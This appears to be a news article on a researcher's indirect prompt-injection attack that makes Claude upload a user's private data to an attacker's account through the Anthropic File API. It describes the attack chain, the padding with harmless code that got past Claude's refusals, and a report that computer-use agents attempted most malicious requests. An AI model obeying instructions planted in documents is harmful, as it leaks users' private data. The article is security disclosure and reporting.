Claude code will send your data to crims ... if they ask it nicely
Company tells users concerned about exfiltration to 'stop it if you see it'
A researcher has found a way to trick Claude into uploading private data to an attacker's account using indirect prompt injection. Anthropic says it has already documented the risk, and its foolproof solution is: keep an eye on your screen.
Security researcher Johann Rehberger (wunderwuzzi), who has identified dozens of AI-oriented vulnerabilities, has published a summary of a proof-of-concept attack he developed for stealing private data via Claude.
When asked about the exploit, Anthropic posited that its existing documentation adequately warns users about the possibility of data exfiltration when they enable network connectivity. The company's recommended mitigation for network access risks is to "monitor Claude while using the feature and stop it if you see it using or accessing data unexpectedly."
"The exploit hijacks Claude and follows the adversaries instructions to grab private data, write it to the sandbox, and then calls the Anthropic File API to upload the file to the attacker's account using the attacker's API key," Rehberger wrote in his explanatory post.
The use of the term "sandbox" suggests more security than the word actually affords in the context of AI tools. Last month, Claude gained the ability to create and edit files, and also gained access to "a private computer environment where it can write code and run programs."
That capability, similar to a prior JavaScript analysis feature, comes with the option to enable network access. And when you do so, your private sandbox is potentially exposed to the public internet.
Anthropic provides network egress settings to limit the potential risk, though as Rehberger's attack demonstrates, any network access setting is a problem.
Network access is enabled by default for Pro and Max accounts; for Team plans, it's off by default but becomes active for everyone once administratively enabled; and for Enterprise plans, it's off by default and is subject to organizational network access controls.
When network access is enabled, the default scope is to provide access only to package managers (e.g. npm, PyPI, GitHub). More permissive settings provide for allow-listed domains or for full network access.
But as Rehberger observed, even the most restrictive network setting (package managers only) comes with the ability to access Anthropic APIs. And he realized he could use this API with his own API key in place of the victim's to exfiltrate data from the victim's Anthropic account.
The attack starts with a document that contains malicious instructions. In order for the attack to work, the victim needs to ask Claude to summarize the document. Claude, like other AI models, may then execute the attack prompt that has been injected into the document content, because that's how prompt injection works – models can't separate content from directives.
Rehberger has chosen not to release his specific injected prompt but says that it's not straightforward. Claude rejected his initial attempts – the model didn't want to ingest the attacker API key in clear text.
But Rehberger found a way to get Claude to cooperate by mixing in a lot of harmless code, like print('Hello, world'), into his prompt, to convince the model that nothing was amiss. He has published a video on YouTube that demonstrates the attack.
Rehberger disclosed the indirect prompt injection vulnerability to Anthropic through HackerOne and says that his report was closed for being out of scope.
- Microsoft seemingly just revealed that OpenAI lost $11.5B last quarter
- AI layoffs to backfire: Half quietly rehired at lower pay
- Google parent company spending like a drunken sailor as capex triples over 2 years
- Invisible npm malware pulls a disappearing act – then nicks your tokens
"This report was incorrectly closed as out of scope due to a process error," an Anthropic spokesperson told The Register in an email. "Data exfiltration issues are valid reports under our program. However, we had already identified and publicly documented this specific risk in our security documentation before the report was submitted."
We inquired whether the company might consider implementing a check to detect when one Anthropic account uses an API key tied to a different Anthropic account, but we've not heard back.
Anthropic appears to be satisfied that its security guidance adequately informs customers about the potential risks of giving AI models access to networks and tools. The biz explicitly warns against this possibility in the security considerations section of its documentation about file creation and network access.
The AI outfit explains, "It is possible for a bad actor to inconspicuously add instructions via external files or websites that trick Claude into: 1) Downloading and running untrusted code in the sandbox environment for malicious purposes; 2) Reading sensitive data from a connected knowledge source (for example, Remote MCP, projects) and using the sandbox environment to make an external network request to leak the data."
Prompt injection and other forms of abuse are possible not just for Anthropic's Claude, but for pretty much any AI model given access to a network, either via integration with a web browser or when computer usage is implemented – as in Claude Sonnet 4.5.
hCaptcha Threat Analysis Group recently evaluated OpenAI's ChatGPT Atlas, Anthropic's Claude Computer Use, Google's Gemini Computer Use, Manus AI, and Perplexity Comet to see how well they resist nefarious meddling. The biz found, "Across the board, these products attempted nearly every malicious request with no jailbreaking required, generally failing only due to tooling limitations rather than any safeguards."
hCaptcha reports seeing a few refusals, but says those could be overcome by rephrasing the request or other basic jailbreaking techniques.
"It is hard to see how these products can be operated in their current state without causing liability for their creators," the security firm mused. "Every request comes back to the company server in most tools, and yet abuse controls are nearly absent." ®